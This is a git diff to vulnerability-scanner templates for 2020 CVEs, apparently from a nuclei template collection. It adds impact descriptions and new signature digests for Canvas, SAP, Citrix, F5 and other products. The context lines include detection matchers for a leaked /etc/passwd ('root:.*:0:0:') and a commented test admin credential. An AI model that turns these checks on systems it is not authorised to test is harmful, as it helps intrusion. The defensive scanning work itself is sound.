+# digest: 4a0a00473045022100950d1db476a748712ce1b13105fad35e2d9c036eaa1805a340083efa3938817102200b3a3a041d9843285fa54f18a9bc47954f49e77da5564a322407cc71eb994b25:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml
index 2ff62e54ee..1f0798ae92 100644
--- a/http/cves/2020/CVE-2020-5775.yaml
+++ b/http/cves/2020/CVE-2020-5775.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: medium
   description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: |
     Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.
   reference:
@@ -34,4 +36,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a0048304602210091d826c0b56c33de240d3afc7ae1cd52c0eff6d1dbdb89a69d20e5a717a62aee022100e6e8978bfdf902d34629f2e73be5b64ef81c6ddee799af63683520d41bcb0623:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204596ab57fa24ea7b68a76b3487e53f5afb6e8c8b4dc81878b11633266ea076df022073cc984599a0991687121e5b3f13d4ad269d195781c9529f0dd6ed732744d3bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml
index 77cd8593e5..3b32fc90ea 100644
--- a/http/cves/2020/CVE-2020-5776.yaml
+++ b/http/cves/2020/CVE-2020-5776.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.
   remediation: |
     Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210095e67e04b34ad5a11a5d77cdbf4cabde4ff133957d7e16763495be0f427c451602206d6cc99dda5bd24133b0c44263fa27aa3e630514d36bd1ef1766b2eb12f07073:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100df5eaffef3553bf23a0f630f7bd46b45d95ee1a219a05158d72b2211a181d5f202204fb78ea26fb289765734a80cd5907cf8cb517ac92a626fc82b23356057f8d611:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml
index 822e328730..a2f1e202fb 100644
--- a/http/cves/2020/CVE-2020-5777.yaml
+++ b/http/cves/2020/CVE-2020-5777.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the Magento Mass Importer plugin.
   remediation: |
     Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 503
-# digest: 4b0a00483046022100b09dd693d302c6e5dc35c8ec12e61565947180b20679ccca2a517174c29f8721022100b98ffd390f77377643a1e061220f4c3b39e21acecfc002d8ad0a8ce2b6776842:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f9a5c92947ff2063d9325e05ed647dd10cf44a7cda70c03eacf178f1338226d60220113ce4c2312b7a8ae81ceaaf037673ce642d17c4a20679f9f5f0af24a8d4c86d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml
index 0e8feddcf8..a6936c41ad 100644
--- a/http/cves/2020/CVE-2020-5902.yaml
+++ b/http/cves/2020/CVE-2020-5902.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot,dwisiswant0,ringo
   severity: critical
   description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI.
   reference:
@@ -87,4 +89,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201536baffa0fa0b44044f364d1c990ebd3de00aa527a18c0111f3070bfcdf5e980221008a4437aff9ad5d5672811da551fa99805e9513c7f53d3ed3f10231d3e28ba1aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022026b3c04f6fed9a59729537cbbc17e1015a565aaa678211a8b310a048b06cdf0202203ad960260e66d2cf213e5f2590260134d7ab9987c105396a4334911534e0a7a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml
index ae632b0208..5fbef6adf9 100644
--- a/http/cves/2020/CVE-2020-6171.yaml
+++ b/http/cves/2020/CVE-2020-6171.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dd99360ef05e766036b49841f742130f45973e1578d7e0303878fd7c249add96022100a6fc48b051e91233f00a5eadfaa3a6ca35b7a940ad87d11d6e1b2222bae8b87e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aa96581a4c7f77c0e36fb4da0c40434f53eef55dda36fa59b928c42e7e814da3022016172ec85f60216f3b531da0b075efd4f73942002b4909688cdafdcf6a0cdf4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml
index e134332e64..588379f8de 100644
--- a/http/cves/2020/CVE-2020-6207.yaml
+++ b/http/cves/2020/CVE-2020-6207.yaml
@@ -5,6 +5,8 @@ info:
   author: _generic_human_
   severity: critical
   description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
   remediation: |
     Apply the latest security patches provided by SAP to mitigate this vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ec9a677787ce716053b7ab319b77788c08e4674246301910f9c4dc4183ffe945022100abcc91f52af46c9d56e32eead4f1e3ece042d239857b6b4c31f8539b3d5fc3dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210088e20e08ce7cc7d7f6c0aed9e95fbbeca7d20fc4a49b4061214814c8f19ee1b20220491060c55d1226f9b59eb58d88287401989bfba6df261976e4d240f26ca115e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml
index c3a8749f29..98634f2801 100644
--- a/http/cves/2020/CVE-2020-6287.yaml
+++ b/http/cves/2020/CVE-2020-6287.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system.
   remediation: |
     Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
 
 # userName - sapRpoc6351
 # password - Secure!PwD8890
-# digest: 4b0a00483046022100b57a2b4c0eeea1671ee5a79d7b9b195e5afc246cc2e3c45d7039d4c1dbea9a3d022100ceec55521350c86600d5383809ce117d6ff39deb7e54451af6397f7675e551e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b19a292d073707c2a62a60266109e8184180be7aac276b0ece9e1f5ab05a11f8022100a41ce09247707ac7505935a8526cd615a99b19a858609d205e04fb959598ec6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml
index 4d26ba86f4..682a8eeb1a 100644
--- a/http/cves/2020/CVE-2020-6308.yaml
+++ b/http/cves/2020/CVE-2020-6308.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.
   remediation: |
     Apply the relevant security patches provided by SAP to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: location
         words:
           - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
-# digest: 490a0046304402205193235daa815683f7bef0a07f786de6399691e7cfebf1db2d60dfb24eb8fe87022046b2f42de8cf14a713e3ba197be626b560f017bc44a9a98c773978e86dc4276f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022011c719b6f8d80b2f4fd86c6c9f32a111ab7a0faa4296be0cb2072d4a573af1d102206784f6bd53a65ce73cec3807b996db1b3ba3661a7777fef3deae6a4ef3f4012d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml
index 1c426a135d..de2f8f7f56 100644
--- a/http/cves/2020/CVE-2020-6637.yaml
+++ b/http/cves/2020/CVE-2020-6637.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of OpenSIS.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022032ae96a9e391c7f5d977fea21052861de3544436610f9a62a4c775a4e39bc4350221008e2a61800c35a6433a5505b6c56e4b357102a0acb5d7b071d73a96a236b95a35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ea2d92d10c6289f2bb20bd5c57decd747ccf9db03434c134fdd1623129228e03022100ac70366e5f827ba102d38cef925d961fd8a063b09beb682e8588a8ea69d2c9a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml
index 09019775b6..1c518eb5ff 100644
--- a/http/cves/2020/CVE-2020-7107.yaml
+++ b/http/cves/2020/CVE-2020-7107.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: Fixed in version 1.8.30.
   reference:
     - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f50b0b712fb8e53dd56c27f707cc03885da6e116f4c775ecdd3ebfe70ab6cc8a022100aa04debb0647b2084d6f35fc0b8ff291fdc6be53357dccb2eb7db7b36a194c0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a269b1f02d5f0ce47d69178a03b297434f15d7e7c917ab3217af4366981e677e022066a4633d84509cdb21a43e92ba23ab04d150426091155b1615130af5fe5c92de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml
index 8a7cf0e9c2..fba779e107 100644
--- a/http/cves/2020/CVE-2020-7136.yaml
+++ b/http/cves/2020/CVE-2020-7136.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
+  impact: |
+    An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
   remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
   reference:
     - https://www.tenable.com/security/research/tra-2020-02
@@ -55,4 +57,4 @@ http:
           - '"sessionId":"([a-z0-9.]+)"'
         internal: true
         part: body
-# digest: 4b0a00483046022100c5a52697491a6885cb18e865de6468fafa32e19b76af89a47e64eb9682cbe47a022100b7fcc512d8d115395d5db0cacddbe63c851e8f753d0f64d341dde9c3f25e267d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220225416153aba70b11bf469fa572feb82ea896bf16b089bf613705c994c5abcbe02205ed4ff4e017d6d7cb5b51e6dc96bd2b43e950f7a248f00e040021d8bf4852e23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml
index 3853ad4551..cf783a58f8 100644
--- a/http/cves/2020/CVE-2020-7209.yaml
+++ b/http/cves/2020/CVE-2020-7209.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: This is resolved in release 6.0-2.
   reference:
     - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html
@@ -37,4 +39,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a004830460221009c9c5e346b42aaf6f68987ddd570b2973649c9782de6b0e891702f368c5c3493022100c8212a41ab644beb79fac7f997300de3c39e4ae877ef55971615975e5ca8bcbd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210085940f85b1ba38aa1992da29205b9105fa5ccc2f3ea5a4e2ac18fa3a5b22bd03022038bb79831462b5a0e4923fae3dd92f5a66aa4d5641b4f3f97d174d69de1a6edd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml
index 1a298a32e4..c3ed9c321f 100644
--- a/http/cves/2020/CVE-2020-7318.yaml
+++ b/http/cves/2020/CVE-2020-7318.yaml
@@ -10,6 +10,8 @@ info:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
     - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7318
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
   remediation: |
     Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b75eb7cd83650fbeb7b1ae985df83fec176229042520ae2653ce72e7661c354b02200eb58f7ef0236c5637ebcb572b4c4fef15c607f935d813bae5aba9b4cd510606:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100faa284d4b06f356396d8eda1bbc7e0c575dee731484144ead94fb124061a10b90220765eff51eae247034142d964e680d1ea99d4eec6f0baf29b3d98e9ecdbec1f73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml
index be87d95fdb..ee9777a952 100644
--- a/http/cves/2020/CVE-2020-7796.yaml
+++ b/http/cves/2020/CVE-2020-7796.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a0046304402207955dba0eeb56169d7e77844ad750ffffa8074eabfb350e856e75351d140a9c0022008f7e4b9aa3f00637f439fcb56f57e8161d2f33e367b4c09c39d2d028cf733ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b0586bd4ace942d4d59c04f2a9368466ae2e3c8d9680c94ff155954924d439bc022100a44be5817e0514a59b484e874389e8f1ed996cedd7ca57bca4a42308da4ed59b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml
index 38ea03361e..9b4253b2e7 100644
--- a/http/cves/2020/CVE-2020-7943.yaml
+++ b/http/cves/2020/CVE-2020-7943.yaml
@@ -5,6 +5,8 @@ info:
   author: c-sh0
   severity: high
   description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB.
   remediation: |
     Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206803ae9479dd21d0bb8f4bdf294cf19748b6d1e26f81257341997855754d4e1c022100a13c3206f8ccec699fcd1d82d1623a1bb46e12a1ad7423da41038af7945dd3a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a2f530823fd7b29d78bd170d3b7dd4a5442ebed02ab715995d0e2468f63b23802207abdfbc97dc26d1a93fdcd621f9f06f798bb6fdf5bacc78e7e11c86f6bbf3b03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml
index e7f2f07065..a99af0e010 100644
--- a/http/cves/2020/CVE-2020-7980.yaml
+++ b/http/cves/2020/CVE-2020-7980.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: critical
   description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e495886b397e2c24a4532e710ed2aec7233ea18346b517a8a2fe1970909a6bc9022100f510ca588846d033a8bc470afae6592673617baf7f20bb1814dd92c0a4a1c086:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ec98c14084b7761590b59ed9ca9d03d3fe71d87c438b0b3b5632c2b6b391d130022100d6e25e739afa7df17e7f5b0d667912dfb28c69ef39eabd72d9a05bdcfe3318f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml
index 87da897d2f..ec3b000f8a 100644
--- a/http/cves/2020/CVE-2020-8115.yaml
+++ b/http/cves/2020/CVE-2020-8115.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
   reference:
     - https://hackerone.com/reports/775693
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201bda81873d93be05a5918faa1867261a1ca2df14528df1993eabcd9ab996392b022035b124e0bd05f393c15c042ea027f1b4c7d2c45df3441575d444977f71296d51:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200a0fd66bdc9529ea962ab3bcea8378b925303a7fefb660fafd4895b04095e66a022100a1a7741e2f099b717540382c484d3fecdedbec8feb7944448145a8e8385f8915:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml
index e455d60f4e..8a69114608 100644
--- a/http/cves/2020/CVE-2020-8163.yaml
+++ b/http/cves/2020/CVE-2020-8163.yaml
@@ -5,6 +5,8 @@ info:
   author: tim_koopmans
   severity: high
   description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
   remediation: |
     Upgrade Ruby on Rails to version 5.0.1 or above.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f03eb2430ba6d2d1a02cb01e2dc01777e3ea6d3f32567250c7c10eef5e1db90f022001e0e8b88182649bca82dfc706b34e5f9b515787d741fc41f284a6d32a67fbbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220303209e532d0dfe490faba387df749d90931a46bf923f3432403b285f4dd47f602200f4d9eedd41068f0cfe78bfd6e6b8449ad02fc557a16a37beef91188d8feace5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml
index 33e8ec716c..4975a714ed 100644
--- a/http/cves/2020/CVE-2020-8191.yaml
+++ b/http/cves/2020/CVE-2020-8191.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cccd398b4c4e9645c960353baa80decea16ee057c38657e4acc0b5ec3ea446d202200d7d3c7f60f7f7ae8e78723b406251f5682e203ed589c76e7e7ca827e4869058:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e01b06ff3c04d1633ebd86cbd4e9a1b7b93acdd84ea81e18230d97a8ed3ed967022042d18e18c2627a8d64a37acfdd722f4bb384546a74d28cf6c8c36b946f33c5a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml
index 3c59251313..3bce2b99ac 100644
--- a/http/cves/2020/CVE-2020-8193.yaml
+++ b/http/cves/2020/CVE-2020-8193.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.
+  impact: |
+    An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
   remediation: |
     Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability.
   reference:
@@ -77,4 +79,4 @@ http:
           - "(?m)[0-9]{3,10}\\.[0-9]+"
         internal: true
         part: body
-# digest: 4a0a00473045022100e81f2ad407f33c6332da25bdea74ba3604421f0952f221dfe83b061dde51e8c0022041291b76d606acfce01624e013b703f1995f24ff39335acc0fa19b696057ec6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022026c6ae03c0f39091314bd7b76cebfee8c6e031af74d6780b2119d9ad05c2a2c5022066dededa2c9f8fe347185f2b522fef81047d56d490b38707429aabdd74ace93c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml
index 5c2cdd6256..dac83359cc 100644
--- a/http/cves/2020/CVE-2020-8194.yaml
+++ b/http/cves/2020/CVE-2020-8194.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206cccdd218ee948a212b0d20fa155d521e1bb70057169d4e16c9d422788ae752f022100c8b6f67c66cfb690250df6b0e3a0850fd7dde55bddac89072a87da3b1d53fe1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c7ad7895a3a2237f62c071b66d60f12bab59084db3d4452239d0d6be39ab453d0220116e1230c5e3237859ca6e50cb313f7ee40da5e29ce88383cae1908fc43dd4f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml
index bdf6bb15ea..ad29fa152b 100644
--- a/http/cves/2020/CVE-2020-8209.yaml
+++ b/http/cves/2020/CVE-2020-8209.yaml
@@ -10,6 +10,8 @@ info:
     - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
     - https://support.citrix.com/article/CTX277457
     - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
+  impact: |
+    An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.
   remediation: |
     Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a00483046022100c966a6502bf313f8d7da461432836fde77af14ecf305f77f40b4ca2fde820b4f022100afb2d8389b17d08036f524b118cfcf19448c4c2c06c085603388855ea673c0b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207a17d71ee590f8d28942c2bca02a8a4682a253de204a9584a0ec744984f6a16e02204d9c4f4fff94792b05988330dd533f9d0903526b2b8e2ec3823bae5b14d149ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
